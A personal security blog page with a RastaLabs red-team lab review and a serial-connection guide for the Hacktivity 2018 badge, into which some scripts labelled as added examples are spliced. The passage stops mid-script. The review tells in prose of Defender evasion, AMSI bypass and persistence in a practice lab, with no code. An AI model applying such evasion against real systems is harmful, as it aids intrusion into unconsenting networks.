Jump ESP, jump!

This is the end - and the beginning (2023-04-06)
<p>This post is just to inform everyone not to expect any new blog posts here; I am moving everything to Jekyll + GitHub Pages.</p><p>You can find the old posts and all the new posts here:</p><p><a href="https://httpscolonforwardslashforwardslashwwwdotzoltanbalazsdotcom.com/">https://httpscolonforwardslashforwardslashwwwdotzoltanbalazsdotcom.com/</a></p><p>So long Google.</p>

The RastaLabs experience (2020-01-16)
<div dir="ltr" style="text-align: left;" trbidi="on">
<h2 style="text-align: justify;">
Introduction</h2>
<div style="text-align: justify;">
<br /></div>
<div style="text-align: justify;">
It was 20 November, and I was just starting to wonder what I would do during the next month. I had already left my previous job, and the new one would only start in January. Playing with PS4 all month might sound fun for some people, but I knew I would get bored quickly.</div>
<div style="text-align: justify;">
<br /></div>
<div style="text-align: justify;">
Even though I have some limited red teaming experience, I always felt that I wanted to explore the excitement of getting Domain Admin – again. I got my first DA in ~2010 using pass-the-hash, but that was a loooong time ago, and things change quickly.</div>
<div style="text-align: justify;">
While reading the backlogs of one of the many Slack rooms, I noticed that certain chat rooms were praising RastaLabs. Looking at the lab description, I felt "this is it, this is exactly what I need." How hard could it be, I have a whole month ahead of me, surely I will finish it before Christmas. Boy, was I wrong.</div>
<div style="text-align: justify;">
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhX9HSCADL24xxQ0Kg_NXa_FNm5MZGslgMFRmvyfBxlANXhVCdlXK6n_D3canWgLv8Wl15Y7IPEqVm1EvM51bzSJqI7Sq0JbcCWn8NH3lTwKTwJz0q3Ert19UDt9upZFlVmTz2BCLQlov9C/s1600/giphy.gif" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="365" data-original-width="500" height="233" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhX9HSCADL24xxQ0Kg_NXa_FNm5MZGslgMFRmvyfBxlANXhVCdlXK6n_D3canWgLv8Wl15Y7IPEqVm1EvM51bzSJqI7Sq0JbcCWn8NH3lTwKTwJz0q3Ert19UDt9upZFlVmTz2BCLQlov9C/s320/giphy.gif" width="320" /></a></div>
<div style="text-align: justify;">
<br /></div>
<div style="text-align: justify;">
<br /></div>
<div style="text-align: justify;">
The one-time fee for starting the lab is 90 GBP, which includes the first month; every additional month costs 20 GBP. I felt like I was stealing money from Rastamouse and Hackthebox... How can it be so cheap? Sometimes cheap indicates low quality, but not in this case.</div>
<div style="text-align: justify;">
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjaTG24jyy9dWBygfa5YTCiRpT2Mn61k9hk-CHGj2pN2NcPcn7CqzJXyIEZYeWS7C2tvIg_6Zgo59ywTf462kI-0FeZuwGL7JBgvABQtxknImp0U0f1oDmbEe07Bc4iHcD9HsAXu86snDRu/s1600/tenor+%25281%2529.gif" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="368" data-original-width="498" height="236" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjaTG24jyy9dWBygfa5YTCiRpT2Mn61k9hk-CHGj2pN2NcPcn7CqzJXyIEZYeWS7C2tvIg_6Zgo59ywTf462kI-0FeZuwGL7JBgvABQtxknImp0U0f1oDmbEe07Bc4iHcD9HsAXu86snDRu/s320/tenor+%25281%2529.gif" width="320" /></a></div>
<div style="text-align: justify;">
<br /></div>
<div style="text-align: justify;">
<br /></div>
<h2 style="text-align: justify;">
My experience</h2>
<div>
<br /></div>
<div style="text-align: justify;">
Regarding my previous experience, I already took OSCP, OSCE, SLAE (Securitytube Linux Assembly Expert), and PSP (Powershell for Pentesters), all of which helped me a lot during the lab. I also had some limited red teaming experience. I had more-than-average experience with AV evasion, and I already had experience with the new post-exploit frameworks like Covenant and Powershell Empire. As for writing exploits, I knew how a buffer overflow or a format string attack worked, but I lacked practice in bypassing ASLR and NX. I basically had zero experience with Mimikatz on Windows 10. I used Mimikatz back in 2012, but probably not since. I also had a lot of knowledge on how to do X and Y, on useful tools and hot techniques, but I lacked recent experience with them. Finally, I am usually the last when it comes to speed in hacking, but I have always balanced my lack of speed with perseverance.</div>
<div style="text-align: justify;">
<br /></div>
<h2 style="text-align: justify;">
RastaLabs starts in 3,2,1 ...</h2>
<div style="text-align: justify;">
<br /></div>
<div style="text-align: justify;">
So I paid the initial entry fee, got the VPN connection pack, connected to the lab, and got my first flag after ... 4 days. And there were 17 of them in total. This was the first time I started to worry. I did everything to keep myself on the wrong track, stupid things like assuming incorrect lab network addresses, scanning too few machines, finding the incorrect breadcrumbs via OSINT, trying to exploit a patched web service (as most OSCPers would do), etc. I was also continually struggling with the tools I was using, as I never knew whether they were buggy, or I was misusing them, or this is just not the way to get the flag. I am sure someone with luck and experience could have done this stage in 2-3 hours, but hey, I was there to gain experience.</div>
<div style="text-align: justify;">
<br /></div>
<div style="text-align: justify;">
During the lab, whenever I got stuck with the same problem for more than 30-40 hours and my frustration was running high, I pinged Rastamouse on the official RastaLabs support channel on <a href="https://mm.netsecfocus.com/">https://mm.netsecfocus.com/</a>. I usually approached him like "Hi, I tried X, Y, and Z but no luck", then he replied "yeah, try Y harder". This kind of information was usually all I needed, and 2-3 hours later I was back on track again. His help was always enough, but never too much to spoil the fun. The availability and professionalism of Rastamouse was 10/10. Huge multi-billion dollar companies fail to provide good enough support, yet this one guy was always there to help. Amazing. I highly recommend joining the Mattermost channel – it will help you a lot to see that you are not the only one stuck with problems. But please do not DM him or the channel if you have not already tried harder.</div>
<div style="text-align: justify;">
<br /></div>
<div style="text-align: justify;">
What's really lovely in the lab is that you can expect real-world scenarios with "RastaLabs employees" working on their computer, reading emails, browsing the web, etc. I believe it is not a spoiler here that at some point in time you have to deliver malware that evades the MS Defender AV on the machine. Yes, there is a real working Defender on the machines, and although it is a bit out of date, it might catch your default payload very quickly. As I previously mentioned, luckily I had recent experience with AV evasion, so this part was not new to me. I highly recommend setting up your own Win10 with the latest Defender updates and testing your payload on it first. If it works there, it will work in the lab. This part can be especially frustrating, because the only feedback you get from the lab is that nothing is happening, and there is no way to debug it. Test your solution locally first.</div>
<div style="text-align: justify;">
<br /></div>
<div style="text-align: justify;">
Powershell Empire turned out to be an excellent solution for me; the only functionality it lacked was port forwarding. But you can drop other tools to do this job efficiently.</div>
<div style="text-align: justify;">
<br /></div>
<div style="text-align: justify;">
A little help: even if you manage to deliver your payload and you have a working C&amp;C, it does not mean your task with AV evasion is over. It is highly probable that Defender will block your post-exploitation code. To bypass this, read all the blog posts from Rastamouse about AMSI bypass. This is important.</div>
<div style="text-align: justify;">
<br /></div>
<h2 style="text-align: justify;">
Lateral movement</h2>
<div style="text-align: justify;">
<br /></div>
<div style="text-align: justify;">
When you finally get your first shell back ...</div>
<div style="text-align: justify;">
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhl-fFdD0JTi6ooTGrdn00x9qX-kl84wztcBvAgRhlL42g2pyxJYPSsY1t7DFKXcw7tp-r1Hlb1seuSqk0XXrxj8-J_NZFWlqpJ7PKY8C5S2Jd59SnUf5U1btD_KKI6ysyg_JKzV2Cy7_3N/s1600/Popped+a+Shell+-+Imgur.gif" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="198" data-original-width="250" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhl-fFdD0JTi6ooTGrdn00x9qX-kl84wztcBvAgRhlL42g2pyxJYPSsY1t7DFKXcw7tp-r1Hlb1seuSqk0XXrxj8-J_NZFWlqpJ7PKY8C5S2Jd59SnUf5U1btD_KKI6ysyg_JKzV2Cy7_3N/s1600/Popped+a+Shell+-+Imgur.gif" /></a></div>
<div style="text-align: justify;">
<br /></div>
<div style="text-align: justify;">
<br /></div>
<div style="text-align: justify;">
A whole new world starts. From now on, you will spend significant time on password cracking, lateral movement, persistence, and figuring out how Windows AD works.</div>
<div style="text-align: justify;">
In the past, I played a lot of CTF, and from time to time I got the feeling "yeah, even though this challenge was fun, it was not realistic". This never happened during RastaLabs. All the challenges and solutions were 100% realistic, and as the "Ars poetica" of RastaLabs states:</div>
<div style="text-align: justify;">
<br />
<div class="separator" style="clear: both; text-align: center;">
</div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiO9aAIlD3DALaiJCn8INM2tH5Hpg1YZ4ACSVXnPY8sGDBXwumG-34QJseS7Y6_jje6B5sGbbuRl5RUWwpU0tGpVSjbyyerUPIhCq4DxBkeSIqH3RFuHFjM4J9KgnyQ3l5VlA-LYhgWT_V-/s1600/Screen+Shot+2020-01-16+at+17.21.38.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="724" data-original-width="1330" height="217" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiO9aAIlD3DALaiJCn8INM2tH5Hpg1YZ4ACSVXnPY8sGDBXwumG-34QJseS7Y6_jje6B5sGbbuRl5RUWwpU0tGpVSjbyyerUPIhCq4DxBkeSIqH3RFuHFjM4J9KgnyQ3l5VlA-LYhgWT_V-/s400/Screen+Shot+2020-01-16+at+17.21.38.png" width="400" /></a></div>
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
</div>
<div style="text-align: justify;">
<br /></div>
<div style="text-align: justify;">
...which is sooooo true. None of the tasks involve any exploit of any CVE. You need a different mindset for this lab. You need to think about misconfigurations, crackable passwords, privilege abuse, and similar issues. But I believe this lab is still harder to own than 90% of the organizations out there. The only help is that there are no blue-teamers killing our shells.</div>
<div style="text-align: justify;">
<br /></div>
<div style="text-align: justify;">
About the architecture of the lab: when connecting to the lab with VPN, you basically find yourself in a network you might label as "Internet", with your target network being behind a firewall, just as a proper corporate network should be.</div>
<div class="separator" style="clear: both; text-align: justify;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhAL9ItXQDGv-BeoCSkXHq94vPDDz7hTeKQPPcjbz0RXxlAdh82IYGjIIFcurVhEUNZrhb0f_NQQJa0NNN2cwX5nt_j5WWsgnp1gbZuXMQ4Ct3GagPFUMHvuDwgV9c_4LnFrEApnNjdW6ey/s1600/Screen+Shot+2020-01-12+at+16.16.21.png" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="777" data-original-width="1600" height="310" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhAL9ItXQDGv-BeoCSkXHq94vPDDz7hTeKQPPcjbz0RXxlAdh82IYGjIIFcurVhEUNZrhb0f_NQQJa0NNN2cwX5nt_j5WWsgnp1gbZuXMQ4Ct3GagPFUMHvuDwgV9c_4LnFrEApnNjdW6ey/s640/Screen+Shot+2020-01-12+at+16.16.21.png" width="640" /></a></div>
<div style="text-align: justify;">
There are a bunch of workstations – Win10 only, and some servers like fileserver, exchange, DC, SQL server, etc. The majority of servers are Windows Server 2016, and there is one Linux server. The two sites are adequately separated and firewalled.</div>
<div style="text-align: justify;">
<br /></div>
<div style="text-align: justify;">
As time passed, I was getting more and more flags, and I started to feel the power. Then the rollercoaster experience started. I was useless, I knew nothing. Getting the flag, I was god. One hour later, I was useless.</div>
<div style="text-align: justify;">
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgMRXZUUVuY28LdTIRsuhTmA0MB3SMyBTktnApZWpwgTHcNKgSMe7v_NXd3Sl8NVeRxic2l_oPn1xWIrgBODKmaCYUhNIqQdVx4tb9VUMyqeAqyzh_35yVMoNo_pimT_tNCleSHYlq7D-nU/s1600/tenor.gif" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="178" data-original-width="250" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgMRXZUUVuY28LdTIRsuhTmA0MB3SMyBTktnApZWpwgTHcNKgSMe7v_NXd3Sl8NVeRxic2l_oPn1xWIrgBODKmaCYUhNIqQdVx4tb9VUMyqeAqyzh_35yVMoNo_pimT_tNCleSHYlq7D-nU/s1600/tenor.gif" /></a></div>
<div style="text-align: justify;">
<br /></div>
<div style="text-align: justify;">
<br /></div>
<div style="text-align: justify;">
For example, I spent a significant amount of time trying to get GUI access to the workstations. In the end, I managed to get that, just to find out I did not achieve anything with it. For unknown reasons, none of the frameworks I tried had a working VNC, so I set up my own, and it was painful.</div>
<div style="text-align: justify;">
<br /></div>
<div style="text-align: justify;">
On December 18, I finally got Domain Admin privileges. So my estimation to "finish the lab" in one month was not that far off. Except that I was far from finishing it, as I still had to find five other flags I was missing. You might ask "you already have DA, how hard could it be to find the remaining five?". Spoiler alert, it was hard. Or to be more precise, not hard, just challenging, and time-consuming. This was also a time when connections on the Mattermost RastaLabs channel helped me a lot. Hints like "flag X is on machine Y" helped me stay motivated, yet did not spoil the fun. Without hints like this, I would not have written this post but would have been stuck with multiple flags.</div>
<div style="text-align: justify;">
<br /></div>
<h2 style="text-align: justify;">
About exploitation</h2>
<div style="text-align: justify;">
<br /></div>
<div style="text-align: justify;">
And there was the infamous challenge, "ROP the night away." This was totally different from the other 16. I believe this image explains it all:</div>
<div style="text-align: justify;">
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjOYf3hOuqqnYYxQulTX1rTnhSOrNG6mcaq25PsfvgoZWvqa7rcjFsg_OcFEPi4d0qRX1t-6Bs9iEbL1yn8LBNslOaKbYo4AnHiFbmW9cK-9r5D-xrwtSQ9IrGWogyPBqQdPFGrgE9fUjQH/s1600/cc18b3bbe0ceeba8a2992e4826a5300db5170652.jpg" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="192" data-original-width="341" height="225" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjOYf3hOuqqnYYxQulTX1rTnhSOrNG6mcaq25PsfvgoZWvqa7rcjFsg_OcFEPi4d0qRX1t-6Bs9iEbL1yn8LBNslOaKbYo4AnHiFbmW9cK-9r5D-xrwtSQ9IrGWogyPBqQdPFGrgE9fUjQH/s400/cc18b3bbe0ceeba8a2992e4826a5300db5170652.jpg" width="400" /></a></div>
<div style="text-align: justify;">
<br /></div>
<div style="text-align: justify;">
If you are not friends with GDB, well, you will have a hard time. If, like me, you don't have lots of hands-on experience with NX bypass, a.k.a. ROP, you will have a hard time with this challenge. The binary exploit challenges during the OSCP and OSCE exams are nowhere near as complex as this one. If you have OSEE, you will be fine. For this challenge, I used GDB-Peda and Python pwntools – check them out in case you are not familiar with them. For me, solving this challenge took about 40 hours. Experienced CTF people could probably solve it in 4 hours or less.</div>
<div style="text-align: justify;">
<br /></div>
<h2 style="text-align: justify;">
Conclusion</h2>
<div style="text-align: justify;">
<br /></div>
<div style="text-align: justify;">
I would not recommend taking this lab for total beginners *. I also do not recommend doing the lab if you only have limited time per day, which is especially true if you are working on your home computer. I probably would have saved hours or even days if I had set up a dedicated server in the cloud for this lab. The issue was that the lab workstations were rebooted every day, which meant that I always lost my shells. "Persistence FTW", you might say, but if your C&C is down when the workstation reboots, you are screwed. "Scheduled tasks FTW", you might say, but unless you have a strict schedule on when you start your computer, you will end up with a bunch of scheduled tasks just to get back the shell whenever you start your computer. Day after day I spent the first hour getting back to where I had been the day before. And I just figured out at the end of the lab why some of my scheduled tasks were not working ...</div>
<div style="text-align: justify;">
<br /></div>
<div style="text-align: justify;">
I would be really interested to see how much time I spent connected to the lab. Probably it was around 200–250 hours in total, which I believe is more than I spent on OSCP and OSCE combined. But it was totally worth it. I really feel the power now that I learned so many useful things.</div>
<div style="text-align: justify;">
<br /></div>
<div style="text-align: justify;">
But if you consider that the price of the one-month lab is 20 GBP, it is still a very cheap option to practice your skills. </div>
<div style="text-align: justify;">
* It is totally OK to do the lab in 6 months, in case you start as a beginner. That is still just 190 GBP for the months of lab access, and you will gain a lot of experience during this time. You will probably have a hard time reaching the point where you have a working shell, but it is OK. You can find all the information on Google; you just need time, patience and willingness to get there.</div>
<div style="text-align: justify;">
<br /></div>
<div style="text-align: justify;">
Anyway, it is still an option not to aim to "get all the flags". Even just by getting the first two flags, you will gain significant experience in "getting a foothold". But for me, not getting all the flags was never an option.</div>
<div style="text-align: justify;">
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjybjXNNmyVPU6SfypHf4DdstNkIIL-enxBiVNNZwDHMksY8bR7UtTBeVr3_vcJu6kEDOhObeQTZUV6KSM85q9_wDe_ZHN_OXwkwVjY-uopUfCaBR7GAcutBaaZ7ChLP3ZWVpUG6vet4taE/s1600/cover8.jpg" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="900" data-original-width="1600" height="225" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjybjXNNmyVPU6SfypHf4DdstNkIIL-enxBiVNNZwDHMksY8bR7UtTBeVr3_vcJu6kEDOhObeQTZUV6KSM85q9_wDe_ZHN_OXwkwVjY-uopUfCaBR7GAcutBaaZ7ChLP3ZWVpUG6vet4taE/s400/cover8.jpg" width="400" /></a></div>
<div style="text-align: justify;">
<br /></div>
<div style="text-align: justify;">
<br /></div>
<div style="text-align: justify;">
If you are still unconvinced, check these other blog posts:</div>
<div style="text-align: justify;">
<a href="https://jmpesp.me/a-rastalabs-story/">https://jmpesp.me/a-rastalabs-story/</a></div>
<div style="text-align: justify;">
<a href="https://www.gerrenmurphy.com/rastalabs-review/">https://www.gerrenmurphy.com/rastalabs-review/</a></div>
<div style="text-align: justify;">
<br /></div>
<div style="text-align: justify;">
Or see what others wrote about RastaLabs.</div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEh3Y7zEKOs1rO1W6pj0g-2A5WUMllNs73qcHdAIsQT8ThOFMFToJAu7Iyr0qF0q1GWtz7lCojkuW5_lEOgPIG-1V6aTzb17MNmPknOmkU9gamuY2apIA_B3lL9QnyO4J7KfiaJsfQwmuqa2/s1600/Screen+Shot+2020-01-12+at+17.21.11.png" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="911" data-original-width="1600" height="364" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEh3Y7zEKOs1rO1W6pj0g-2A5WUMllNs73qcHdAIsQT8ThOFMFToJAu7Iyr0qF0q1GWtz7lCojkuW5_lEOgPIG-1V6aTzb17MNmPknOmkU9gamuY2apIA_B3lL9QnyO4J7KfiaJsfQwmuqa2/s640/Screen+Shot+2020-01-12+at+17.21.11.png" width="640" /></a></div>
<div style="text-align: justify;">
<br /></div>
<div style="text-align: justify;">
<br /></div>
<h2 style="text-align: justify;">
Footnote</h2>
<div style="text-align: justify;">
<br /></div>
<div style="text-align: justify;">
In case you start the lab, please, pretty please, follow the rules, and do not spoil the fun for others. Do not leave your tools around, do not keep shared drives open, do not leave FLAGs around. Leave the machine as it was. If you have to upload a file, put it in a folder others won't easily find. This is a necessary mindset when it comes to real-world red teaming. Don't forget to drop a party parrot into the chat whenever you or someone else gets a new flag. And don't forget:</div>
<blockquote class="tr_bq" style="text-align: justify;">
OSCP has no power here. Cry harder!</blockquote>
<div style="text-align: justify;">
<br /></div>
<div style="text-align: justify;">
I will probably keep my subscription to the lab and try new things, new post-exploit frameworks. I would like to thank @_rastamouse for this great experience, @superkojiman for the ROP challenge, and Hackthebox for hosting the lab with excellent uptime.</div>
<div style="text-align: justify;">
As for @gentilkiwi and @harmj0y, these two guys probably advanced red teaming more than everyone else combined. pwntools from @gallopsled was also really helpful. And I will be forever grateful to Bradley from finance for his continuous support whenever I lost my shells.</div>
</div>
Hacktivity 2018 badge - quick start guide for beginners (2019-09-19)
<div class="separator" style="clear: both; text-align: justify;">
You either landed on this blog post because </div>
<div class="separator" style="clear: both; text-align: justify;">
</div>
<ul>
<li>you are a huge fan of Hacktivity</li>
<li>you bought this badge around a year ago</li>
<li>you are just interested in hacker conference badge hacking. </li>
</ul>
<div class="separator" style="clear: both; text-align: justify;">
or maybe all of the above. Whatever the reasons, this guide should be helpful for those who never had any real-life experience with these little gadgets. </div>
<div class="separator" style="clear: both; text-align: justify;">
But first things first, here is a list of what you need for hacking the badge:</div>
<div class="separator" style="clear: both; text-align: justify;">
</div>
<ul>
<li>a computer with a USB port running macOS, Linux or Windows. You can use another OS as well, but this guide covers these three</li>
<li>USB mini cable to connect the badge to the computer</li>
<li>the Hacktivity badge from 2018</li>
</ul>
<div>
This is how your badge looks by default.</div>
<br />
<div style="text-align: center;">
<img border="0" data-original-height="1600" data-original-width="1200" height="400" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhpol7c4FwjDEp31isJBwAqDG3IroHXFJDvmjhb01t9VdClB_ZKVxUds57uHFJNzx7BDIMH-myTcQ55TEZN6jc7it0OgFg-bCLCeNqMSw4CD_ub11l_41U46Ne0Uh2ISbFLUS0qAxBTxQBB/s400/IMG_8640.JPG" width="300" /></div>
<div class="separator" style="clear: both; text-align: center;">
<br /></div>
<h2 style="clear: both; text-align: justify;">
Let's get started</h2>
<div class="separator" style="clear: both; text-align: justify;">
Luckily, you don't need any soldering skills for the first steps. Just connect the USB mini plug to the bottom left connector on the badge, connect the other end of the USB cable to your computer, and within a few seconds you will see that the lights on your badge are blinking. So far so good. </div>
<div class="separator" style="clear: both; text-align: justify;">
<br /></div>
<div class="separator" style="clear: both; text-align: justify;">
Now, depending on which OS you use, you should choose your destiny here.</div>
<h3 style="text-align: justify;">
Linux</h3>
<div style="text-align: justify;">
The best source of information about a new device being connected is</div>
<div style="text-align: justify;">
# dmesg</div>
<div style="text-align: justify;">
<br /></div>
<div style="text-align: justify;">
The tail of the output should look like</div>
<pre style="text-align: justify;">[267300.206966] usb 2-2.2: new full-speed USB device number 14 using uhci_hcd
[267300.326484] usb 2-2.2: New USB device found, idVendor=0403, idProduct=6001
[267300.326486] usb 2-2.2: New USB device strings: Mfr=1, Product=2, SerialNumber=3
[267300.326487] usb 2-2.2: Product: FT232R USB UART
[267300.326488] usb 2-2.2: Manufacturer: FTDI
[267300.326489] usb 2-2.2: SerialNumber: <b>AC01U4XN</b>
[267300.558684] usbcore: registered new interface driver usbserial_generic
[267300.558692] usbserial: USB Serial support registered for generic
[267300.639673] usbcore: registered new interface driver ftdi_sio
[267300.639684] usbserial: USB Serial support registered for FTDI USB Serial Device
[267300.639713] ftdi_sio 2-2.2:1.0: FTDI USB Serial Device converter detected
[267300.639741] usb 2-2.2: Detected FT232RL
[267300.643235] usb 2-2.2: FTDI USB Serial Device converter now attached to <b>ttyUSB0</b>
</pre>
<div style="text-align: justify;">
<br /></div>
<div style="text-align: justify;">
Dmesg is pretty kind to us, as it even notifies us that the device is now attached to ttyUSB0. </div>
<div style="text-align: justify;">
<br /></div>
<div style="text-align: justify;">
From now on, connecting to the device is exactly the same as it is in the macOS section, so please find the "Linux users, read it from here" section below. </div>
<h3 style="clear: both; text-align: justify;">
macOS</h3>
<div class="separator" style="clear: both; text-align: justify;">
There are multiple commands you can type into Terminal to get an idea about what you are looking at. One command is:</div>
<div class="separator" style="clear: both; text-align: justify;">
</div>
<div>
<pre># ioreg -p IOUSB -w0 -l</pre>
</div>
<div>
<br /></div>
<div>
With this command, you should get output similar to this:</div>
<div>
<br />
<pre>+-o FT232R USB UART@14100000 <class AppleUSBDevice, id 0x100005465, registered, matched, active, busy 0 (712 ms), retain 20>
| {
| "sessionID" = 71217335583342
| "iManufacturer" = 1
| "bNumConfigurations" = 1
| "idProduct" = 24577
| "bcdDevice" = 1536
| "Bus Power Available" = 250
| "USB Address" = 2
| "bMaxPacketSize0" = 8
| "iProduct" = 2
| "iSerialNumber" = 3
| "bDeviceClass" = 0
| "Built-In" = No
| "locationID" = 336592896
| "bDeviceSubClass" = 0
| "bcdUSB" = 512
| "USB Product Name" = "FT232R USB UART"
| "PortNum" = 1
| "non-removable" = "no"
| "IOCFPlugInTypes" = {"9dc7b780-9ec0-11d4-a54f-000a27052861"="IOUSBFamily.kext/Contents/PlugIns/IOUSBLib.bundle"}
| "bDeviceProtocol" = 0
| "IOUserClientClass" = "IOUSBDeviceUserClientV2"
| "IOPowerManagement" = {"DevicePowerState"=0,"CurrentPowerState"=3,"CapabilityFlags"=65536,"MaxPowerState"=4,"DriverPowerState"=3}
| "kUSBCurrentConfiguration" = 1
| "Device Speed" = 1
| "USB Vendor Name" = "FTDI"
| "idVendor" = 1027
| "IOGeneralInterest" = "IOCommand is not serializable"
| "USB Serial Number" = "<b>AC01U4XN</b>"
| "IOClassNameOverride" = "IOUSBDevice"
| }
</pre>
</div>
<div style="text-align: justify;">
The most important information you get is the USB serial number - AC01U4XN in my case.<br />
Another way to get this information is<br />
<pre># system_profiler SPUSBDataType
</pre>
which will give back something similar to:<br />
<pre>FT232R USB UART:
Product ID: 0x6001
Vendor ID: 0x0403 (Future Technology Devices International Limited)
Version: 6.00
Serial Number: <b>AC01U4XN</b>
Speed: Up to 12 Mb/sec
Manufacturer: FTDI
Location ID: 0x14100000 / 2
Current Available (mA): 500
Current Required (mA): 90
Extra Operating Current (mA): 0
</pre>
<div>
<br /></div>
<div>
The serial number is the same in both outputs.<br />
<br />
What you are trying to achieve here is to connect to the device, but in order to connect to it, you have to know where the device is mapped in the /dev folder. A quick and dirty solution is to list all devices under /dev once when the device is connected and once when it is disconnected, and diff the two outputs. For example, the following should do the job:<br />
<br />
<pre># with the badge plugged in
ls -lha /dev/tty* > plugged.txt
# unplug the badge, then list again
ls -lha /dev/tty* > np.txt
# the line present only in plugged.txt is the badge
vimdiff plugged.txt np.txt
</pre>
<br />
The result should be obvious: /dev/tty.usbserial-AC01U4XN is the new device in the case of macOS. In the case of Linux, it was /dev/ttyUSB0.<br />
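<div style="text-align: justify;">
The device identification steps above (the dmesg line on Linux, the serial number from ioreg / system_profiler on macOS, and the before/after listing of /dev) can be scripted so you do not have to eyeball the output every time you replug the badge. The script below is an added example and not part of the original post; it assumes the serial number AC01U4XN from the post as sample input, and it takes the device directory as an optional argument so the functions can be exercised against a throwaway directory without a badge attached.</div>

```shell
#!/bin/sh
# Added example, not code from the original post: find the badge's tty node
# from the FTDI serial number that dmesg / ioreg / system_profiler report,
# or by diffing two /dev listings taken with and without the badge attached.
# Assumptions (mine, not the post's): the serial number AC01U4XN from the
# post is used as sample input, and DEVDIR defaults to /dev but can be any
# directory so the functions can be tested without hardware.
set -eu

# dmesg_attached_tty < dmesg-output
# Extracts the node name from the "... converter now attached to ttyUSB0"
# line; the last match wins if the badge was replugged several times.
dmesg_attached_tty() {
    sed -n 's/.*converter now attached to \([A-Za-z0-9]*\).*/\1/p' | tail -n 1
}

# find_serial_tty SERIAL [DEVDIR]
# macOS names the node tty.usbserial-<serial>; Linux publishes a stable
# symlink under serial/by-id/ whose name contains the serial and which
# points at the ttyUSBn node. Prints the node path, fails if none is found.
find_serial_tty() {
    serial="$1"
    devdir="${2:-/dev}"
    if [ -e "$devdir/tty.usbserial-$serial" ]; then
        printf '%s\n' "$devdir/tty.usbserial-$serial"
        return 0
    fi
    for link in "$devdir"/serial/by-id/*"$serial"*; do
        [ -e "$link" ] || [ -L "$link" ] || continue
        # The symlink target is relative (../../ttyUSB0); its basename is the node.
        target=$(readlink "$link" 2>/dev/null) || target="$link"
        printf '%s/%s\n' "$devdir" "$(basename "$target")"
        return 0
    done
    return 1
}

# new_devices BEFORE_LISTING AFTER_LISTING
# The post's vimdiff step without the editor: prints the lines that exist
# only in the listing taken with the badge connected.
new_devices() {
    grep -F -x -v -f "$1" "$2" || true
}

# Stand-alone use: sh find_badge.sh AC01U4XN
if [ "${1:-}" ]; then
    find_serial_tty "$1" || echo "no tty for serial $1 found under /dev" >&2
fi
```

<div style="text-align: justify;">
For the listing diff, a plain <code>ls /dev/tty*</code> is enough; the long <code>-lha</code> format also works as long as the lines for the unchanged devices are identical in both files.</div>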
<h4>
Linux users, read it from here. macOS users, please continue reading</h4>
Now you can use either the built-in screen command or minicom to get data out of the badge. Usually you need three pieces of information in order to communicate with a badge: the path under /dev (you already have that), the speed in baud, and the async configuration parameters. You can either guess the speed or Google it for the specific device. Standard baud rates include 110, 300, 600, 1200, 2400, 4800, 9600, 14400, 19200, 38400, 57600, 115200, 128000 and 256000 bits per second. I usually found 1200, 9600 and 115200 a common choice, but that is just me.<br />
Regarding the async configuration parameters, the default is that <b>8</b> data bits are used, there is <b>n</b>o parity bit, and <b>1</b> stop bit is used. The short abbreviation for this is 8n1. In the next example, you will use the screen command. By default it uses 8n1, but the 8-bit setting is called cs8 there, just to confuse beginners.<br />
<br />
If you type:<br />
# screen /dev/tty.usbserial-AC01U4XN 9600<br />
or<br />
# screen /dev/ttyUSB0 9600<br />
and wait for minutes and nothing happens, it is because the badge already tried to communicate via the USB port, but no one was listening there. Disconnect the badge from the computer, connect it again, and type the screen command above to connect. If you are quick enough you can see that the amber LED will stop blinking and your screen command is greeted with some interesting information. By quick enough I mean ~90 seconds, as it takes the device 1.5 minutes to boot the OS and the CTF app.<br />
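<div style="text-align: justify;">
Two things in the paragraphs above trip up beginners: translating the 8n1 notation into the flags stty and screen actually use, and the fact that the badge only talks once, right after boot, so a slow reconnect loses the banner. The script below is an added example, not code from the original post; it converts a framing string such as 8n1 into stty flags and logs whatever the badge prints for a configurable number of seconds, so you can replug the badge and read the capture file at leisure. The device path, baud rate and 120-second default are assumptions of mine, matching the 9600 baud and ~90-second boot the post describes.</div>

```shell
#!/bin/sh
# Added example, not code from the original post: turn "8n1"-style framing
# into stty flags and capture the badge's boot output to a file.
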